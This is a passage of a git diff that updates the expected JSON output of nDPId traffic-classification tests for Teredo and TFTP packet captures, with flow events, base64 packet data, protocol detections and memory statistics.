+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"teredo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1438853632713,"flow_last_seen":1438853632766,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1438853653403,"l3_proto":"ip4","src_ip":"10.112.16.64","dst_ip":"194.136.28.76","src_port":56154,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} 
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"teredo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1438853619792,"flow_last_seen":1438853619844,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1438853653403,"l3_proto":"ip4","src_ip":"10.112.16.89","dst_ip":"194.136.28.76","src_port":60381,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"teredo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1438853615305,"flow_last_seen":1438853653403,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":340,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1438853653403,"l3_proto":"ip4","src_ip":"10.112.16.106","dst_ip":"194.136.28.76","src_port":52513,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"teredo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1438853629357,"flow_last_seen":1438853629411,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1438853653403,"l3_proto":"ip4","src_ip":"10.112.16.92","dst_ip":"194.136.28.76","src_port":63448,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":24,"source":"teredo.pcap","alias":"nDPId-test","packets-captured":24,"packets-processed":24,"total-skipped-flows":0,"total-l4-payload-len":1566,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":5,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":30,"global_ts_msec":1438853653403} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 24/24 @@ -36,9 +36,9 @@ ~~ total active/idle flows...: 5/5 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5874379 bytes -~~ total memory freed........: 5874379 bytes -~~ total allocations/frees...: 118154/118154 +~~ total memory allocated....: 6008013 bytes +~~ total memory freed........: 6008013 bytes +~~ total allocations/frees...: 120916/120916 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 687 chars diff --git a/test/results/tftp.pcap.out b/test/results/tftp.pcap.out index c193041cb..d1d136708 100644 --- a/test/results/tftp.pcap.out +++ b/test/results/tftp.pcap.out 
@@ -1,39 +1,52 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tftp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} -00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tftp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1367411051972} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1367411051972,"flow_last_seen":1367411051972,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1367411051972,"l3_proto":"ip4","src_ip":"192.168.0.253","dst_ip":"192.168.0.10","src_port":50618,"dst_port":69,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tftp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1367411051972,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1367411051972,"pkt":"AFCN14tDAAu+GJpACABFAAAwAAAAAP8ROWXAqAD9wKgACsW6AEUAHD4gAAFyZmMxMzUwLnR4dABvY3RldAA="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1367411051972,"flow_last_seen":1367411051972,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1367411051972,"l3_proto":"ip4","src_ip":"192.168.0.253","dst_ip":"192.168.0.10","src_port":50618,"dst_port":69,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"tftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1367411052077,"flow_last_seen":1367411052077,"flow_idle_time":200000,"flow_min_l4_payload_len":516,"flow_max_l4_payload_len":516,"flow_tot_l4_payload_len":516,"flow_avg_l4_payload_len":516,"midstream":0,"thread_ts_msec":1367411052077,"l3_proto":"ip4","src_ip":"192.168.0.10","dst_ip":"192.168.0.253","src_port":3445,"dst_port":50618,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-01120{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1367411052077,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":558,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":558,"pkt_l4_len":524,"thread_ts_msec":1367411052077,"pkt":"AAu+GJpAAFCN14tDCABFAAIgkyUAAIARI1DAqAAKwKgA\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"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1367411052081,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":12,"thread_ts_msec":1367411052081,"pkt":"AFCN14tDAAu+GJpACABFAAAgAAEAAP8ROXTAqAD9wKgACsW6DXUADKpJAAQAAQAAAAAAAAAAAAAAAAAA"} -01120{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1367411052086,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":558,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":558,"pkt_l4_len":524,"thread_ts_msec":1367411052086,"pkt":"AAu+GJpAAFCN14tDCABFAAIgkycAAIARI07AqAAKwKgA\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"} -00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"tftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1367411052077,"flow_last_seen":1367411052088,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":516,"flow_tot_l4_payload_len":1040,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1367411052088,"l3_proto":"ip4","src_ip":"192.168.0.10","dst_ip":"192.168.0.253","src_port":3445,"dst_port":50618,"l4_proto":"udp","ndpi": {"flow_risk": {"5": 
{"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} -00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":100,"source":"tftp.pcap","alias":"nDPId-test","packets-captured":100,"packets-processed":99,"total-skipped-flows":0,"total-l4-payload-len":25011,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":2,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1626968644630} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"tftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626968644630,"flow_last_seen":1626968644630,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1626968644630,"l3_proto":"ip4","src_ip":"172.28.5.91","dst_ip":"172.28.5.170","src_port":44618,"dst_port":69,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"tftp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1626968644630,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1626968644630,"pkt":"eCSvPj0DAFBWn8+KCABFAAAuYudAAEARdJqsHAVbrBwFqq5KAEUAGkfgAAJ6ei5iaW4AbmV0YXNjaWkA"} 
-00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"tftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626968644630,"flow_last_seen":1626968644630,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1626968644630,"l3_proto":"ip4","src_ip":"172.28.5.91","dst_ip":"172.28.5.170","src_port":44618,"dst_port":69,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":101,"source":"tftp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626968644631,"flow_last_seen":1626968644631,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1626968644631,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.5.91","src_port":62058,"dst_port":44618,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"tftp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1626968644631,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":46,"pkt_l4_len":12,"thread_ts_msec":1626968644631,"pkt":"AFBWn8+KeCSvPj0DCABFAAAgqt8AAEARbLCsHAWqrBwFW\/JqrkoADPveAAQAAA=="} 
-01208{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"tftp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1626968644632,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":558,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":558,"pkt_l4_len":524,"thread_ts_msec":1626968644632,"pkt":"eCSvPj0DAFBWn8+KCABFAAIgYuhAAEARcqesHAVbrBwFqq5K8moCDEJWAAMAAR+LCACcqPdgAAPs3L1untmCpufcR\/GhA5oMuEVS\/wLGCRUYA5RkCLATYQCzRPW0DIrcoKTq6cweH4fPYWDDgR3MMew+I389YwMFOnD6+MaFNxG1tLiuquiOnn\/96+5wdXG4eP3u5at3V88Pjw+\/fn59PL\/9+sevm\/vD3bff7x7+7b\/9dv9vz3\/8vD3+8d3h8Pnh8dvxbw4\/Hv7+5z\/ePH79V3\/3+OOffhzPbv\/u8OMf\/7uvjz++Pdz\/q79785erF3+5+LvDvzv\/67fbf\/V3ly+vnv\/LD9\/u\/\/7hX\/3dP\/z8+dd3z5794z\/+41\/+78t\/+fLw\/e\/+zeH\/+VWHf7z5cfiv\/9v\/5uvtf\/Gv\/38u\/P3x7ufPf\/r8\/O2rf\/Pu8Pff7r4ejr\/h59fvh+8Pv+5\/Hr4+Pj48vjv8+vH73\/\/4\/J\/\/7fl\/+uHfHM7\/q8OzP24enz3+un\/2n0+e\/aeTd4e\/\/S9\/+9\/\/+d8f\/vnf\/+0\/\/O3\/\/Nt\/\/Nv\/9rf\/ePjn\/\/mf\/6d\/\/vf\/\/D8ef\/w\/\/uVPf\/tf\/\/Yf0NDQ0NDQ0Oq0V09oN\/c3Xx4f7j8\/v3j+4oj71w+\/H\/77f\/mLv9zefLv7p\/\/ycPyn37\/d3\/z8fyXM\/8cv+vDw+P3m7vD13337eTi9PPwPx997\/G84e\/JL3uz+j0JDQ0NDQ0Or0Z7vJhoaGhoa"} 
-01208{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"tftp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1626968644632,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":558,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":558,"pkt_l4_len":524,"thread_ts_msec":1626968644632,"pkt":"eCSvPj0DAFBWn8+KCABFAAIgYulAAEARcqasHAVbrBwFqq5K8moCDEJWAAMAAR+LCACcqPdgAAPs3L1untmCpufcR\/GhA5oMuEVS\/wLGCRUYA5RkCLATYQCzRPW0DIrcoKTq6cweH4fPYWDDgR3MMew+I389YwMFOnD6+MaFNxG1tLiuquiOnn\/96+5wdXG4eP3u5at3V88Pjw+\/fn59PL\/9+sevm\/vD3bff7x7+7b\/9dv9vz3\/8vD3+8d3h8Pnh8dvxbw4\/Hv7+5z\/ePH79V3\/3+OOffhzPbv\/u8OMf\/7uvjz++Pdz\/q79785erF3+5+LvDvzv\/67fbf\/V3ly+vnv\/LD9\/u\/\/7hX\/3dP\/z8+dd3z5794z\/+41\/+78t\/+fLw\/e\/+zeH\/+VWHf7z5cfiv\/9v\/5uvtf\/Gv\/38u\/P3x7ufPf\/r8\/O2rf\/Pu8Pff7r4ejr\/h59fvh+8Pv+5\/Hr4+Pj48vjv8+vH73\/\/4\/J\/\/7fl\/+uHfHM7\/q8OzP24enz3+un\/2n0+e\/aeTd4e\/\/S9\/+9\/\/+d8f\/vnf\/+0\/\/O3\/\/Nt\/\/Nv\/9rf\/ePjn\/\/mf\/6d\/\/vf\/\/D8ef\/w\/\/uVPf\/tf\/\/Yf0NDQ0NDQ0Oq0V09oN\/c3Xx4f7j8\/v3j+4oj71w+\/H\/77f\/mLv9zefLv7p\/\/ycPyn37\/d3\/z8fyXM\/8cv+vDw+P3m7vD13337eTi9PPwPx997\/G84e\/JL3uz+j0JDQ0NDQ0Or0Z7vJhoaGhoa"} -00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"tftp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626968644631,"flow_last_seen":1626968644632,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":516,"flow_tot_l4_payload_len":1040,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1626968644632,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.5.91","src_port":62058,"dst_port":44618,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} 
-00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"tftp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1626968644631,"flow_last_seen":1626968644632,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":516,"flow_tot_l4_payload_len":1040,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1626968644632,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.5.91","src_port":62058,"dst_port":44618,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} -00818{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"tftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":98,"flow_first_seen":1367411052077,"flow_last_seen":1367411052258,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":516,"flow_tot_l4_payload_len":24991,"flow_avg_l4_payload_len":255,"midstream":0,"thread_ts_msec":1626968644632,"l3_proto":"ip4","src_ip":"192.168.0.10","dst_ip":"192.168.0.253","src_port":3445,"dst_port":50618,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} 
-00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"tftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1367411051972,"flow_last_seen":1367411051972,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1626968644632,"l3_proto":"ip4","src_ip":"192.168.0.253","dst_ip":"192.168.0.10","src_port":50618,"dst_port":69,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"tftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1626968644630,"flow_last_seen":1626968644630,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1626968644632,"l3_proto":"ip4","src_ip":"172.28.5.91","dst_ip":"172.28.5.170","src_port":44618,"dst_port":69,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} -00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":104,"source":"tftp.pcap","alias":"nDPId-test","packets-captured":104,"packets-processed":104,"total-skipped-flows":0,"total-l4-payload-len":26069,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":24,"global_ts_msec":1626968644632} 
+00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tftp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":946730124846} +00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946730124846,"flow_last_seen":946730124846,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":946730124846,"l3_proto":"ip4","src_ip":"172.28.4.53","dst_ip":"172.16.5.170","src_port":54626,"dst_port":69,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tftp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946730124846,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":61,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":61,"pkt_l4_len":27,"thread_ts_msec":946730124846,"pkt":"9Opn97JCCAAnntJbCABFAAAv+hlAAEAR3pisHAQ1rBAFqtViAEUAGx52AAEAAAAAAAAAAAAAAG9jdGV0AA=="} 
+00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946730124846,"flow_last_seen":946730124846,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":946730124846,"l3_proto":"ip4","src_ip":"172.28.4.53","dst_ip":"172.16.5.170","src_port":54626,"dst_port":69,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} +00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"tftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946730124846,"flow_last_seen":946730124846,"flow_idle_time":200000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":946730124846,"l3_proto":"ip4","src_ip":"172.28.4.53","dst_ip":"172.16.5.170","src_port":54632,"dst_port":69,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946730124846,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":51,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":51,"pkt_l4_len":17,"thread_ts_msec":946730124846,"pkt":"9Opn97JCCAAnntJbCABFAAAl+hlAAEAR3pisHAQ1rBAFqtVoAEUAER52AAEAb2N0ZXQA"} 
+00749{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"tftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946730124846,"flow_last_seen":946730124846,"flow_idle_time":200000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":946730124846,"l3_proto":"ip4","src_ip":"172.28.4.53","dst_ip":"172.16.5.170","src_port":54632,"dst_port":69,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"tftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946730124846,"flow_last_seen":946730124846,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":946730124846,"l3_proto":"ip4","src_ip":"192.168.0.253","dst_ip":"192.168.0.10","src_port":50618,"dst_port":69,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tftp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":946730124846,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":946730124846,"pkt":"AFCN14tDAAu+GJpACABFAAAwAAAAAP8ROWXAqAD9wKgACsW6AEUAHD4gAAFyZmMxMzUwLnR4dABvY3RldAA="} 
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946730124846,"flow_last_seen":946730124846,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":946730124846,"l3_proto":"ip4","src_ip":"192.168.0.253","dst_ip":"192.168.0.10","src_port":50618,"dst_port":69,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"tftp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946730124846,"flow_last_seen":946730124846,"flow_idle_time":200000,"flow_min_l4_payload_len":516,"flow_max_l4_payload_len":516,"flow_tot_l4_payload_len":516,"flow_avg_l4_payload_len":516,"midstream":0,"thread_ts_msec":946730124846,"l3_proto":"ip4","src_ip":"192.168.0.10","dst_ip":"192.168.0.253","src_port":3445,"dst_port":50618,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +01118{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tftp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":946730124846,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":558,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":558,"pkt_l4_len":524,"thread_ts_msec":946730124846,"pkt":"AAu+GJpAAFCN14tDCABFAAIgkyUAAIARI1DAqAAKwKgA\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"} 
